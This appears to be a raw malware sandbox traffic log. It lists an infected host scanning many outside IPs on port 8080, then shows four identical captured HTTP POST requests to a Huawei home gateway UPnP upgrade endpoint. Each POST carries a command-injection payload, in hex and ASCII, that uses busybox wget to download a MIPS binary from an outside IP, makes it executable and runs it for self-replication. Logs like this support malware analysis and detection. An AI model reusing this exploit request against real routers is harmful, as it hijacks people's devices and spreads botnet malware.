                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 212.180.132.132:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 109.66.108.35:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 27.109.250.68:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 25.229.159.53:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 110.11.245.252:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 1.148.241.218:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 161.19.107.105:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 5.167.138.100:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 88.222.22.236:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 155.95.15.51:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 85.246.75.45:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 151.39.113.8:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 69.189.191.133:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 166.35.128.245:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 86.59.46.83:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 203.96.150.227:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 171.102.117.51:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 166.88.13.162:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 193.161.110.26:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 41.33.78.79:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 132.190.194.63:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 123.218.142.231:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 182.250.217.200:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 144.222.179.167:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 188.93.43.220:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 180.53.100.122:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 123.254.36.27:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 151.65.44.50:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 169.142.251.111:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 60.199.250.253:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 190.255.25.210:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 64.171.182.210:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 12.246.143.133:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 200.32.230.230:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 67.177.134.140:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 149.109.141.219:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 136.192.30.252:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 61.16.116.110:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 180.107.120.165:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 89.30.134.190:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 217.89.237.142:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 129.252.222.152:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 92.232.144.109:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 220.140.40.72:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 74.39.84.180:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 115.85.127.118:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 196.141.27.148:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 49.198.65.184:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 25.100.191.117:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 86.252.55.159:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 105.4.10.24:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 105.101.179.2:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 38.201.15.104:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 150.45.82.57:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 141.121.125.84:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 191.102.50.142:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 151.50.91.215:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 167.33.254.68:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 188.100.7.179:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 19.71.209.10:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 201.191.47.65:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 38.248.216.140:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 80.142.1.195:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 107.246.15.69:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 201.149.17.245:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 155.131.145.255:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 204.10.40.160:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 196.2.47.34:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 213.5.27.50:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 137.171.220.120:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 211.87.145.169:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 97.60.84.249:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 161.145.80.253:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 194.176.89.36:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 155.193.193.167:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 148.133.61.145:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 119.201.131.143:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 147.205.46.171:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 201.73.113.201:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 219.40.128.147:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 25.6.59.236:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 77.102.174.176:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 80.244.6.131:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 98.49.221.33:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 58.236.161.212:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 181.146.195.234:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 204.3.94.221:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 206.203.177.235:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 95.115.93.230:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 197.230.58.238:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 62.64.46.177:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 105.254.175.0:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 115.22.165.48:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 40.105.209.151:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 136.55.4.196:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 80.239.217.245:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 54.153.94.164:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 147.116.179.157:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 72.49.170.241:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 210.186.251.250:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 181.216.191.30:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 157.1.132.5:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 86.29.151.32:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 12.159.22.126:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 177.136.189.21:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 82.23.14.91:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 85.241.35.161:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 117.15.0.151:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 143.145.88.203:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 205.255.35.188:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 168.176.87.237:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 23.133.73.157:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 206.7.69.56:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 101.101.240.57:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 40.251.232.29:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 1.249.65.108:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 185.220.40.36:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 18.44.152.146:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 67.12.171.63:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 191.157.253.175:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 175.200.142.131:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 50.6.154.166:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 128.250.32.160:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 143.142.98.179:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 20.66.187.136:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 155.154.125.80:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 36.47.44.207:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 44.0.196.240:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 147.23.119.104:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 178.152.251.15:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 31.175.18.114:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 74.242.99.123:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 128.15.252.120:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 2.135.46.182:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 115.147.103.12:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 85.123.223.130:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 68.27.115.222:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 166.158.197.165:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 65.193.139.184:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 38.246.149.103:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 47.34.131.195:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 9.169.141.184:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 147.210.238.71:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 132.13.208.169:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 69.69.135.204:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 128.25.178.99:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 217.185.61.142:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 43.73.150.155:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 91.117.118.93:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 199.155.217.66:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 190.119.78.31:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 149.68.34.98:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 59.25.229.67:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 221.97.29.128:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 150.141.247.132:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 25.66.113.19:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 4.20.103.113:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 194.14.133.172:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 71.215.38.132:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 36.186.253.165:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 141.159.140.155:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 159.111.160.122:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 102.244.3.195:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 2.222.91.64:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 146.239.166.111:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 78.33.143.170:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 45.49.245.154:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 207.212.224.175:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 83.137.229.165:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 70.100.161.33:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 179.228.58.202:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 17.233.4.117:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 32.17.22.234:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 49.150.37.228:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 222.91.2.131:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 47.69.31.3:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 198.71.131.47:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 51.158.182.118:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 14.190.29.213:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 65.134.97.132:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 200.124.140.247:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 82.39.214.253:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 165.224.244.21:8080
                  Source: global trafficTCP traffic: 192.168.2.14:31215 -> 171.51.152.61:8080
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
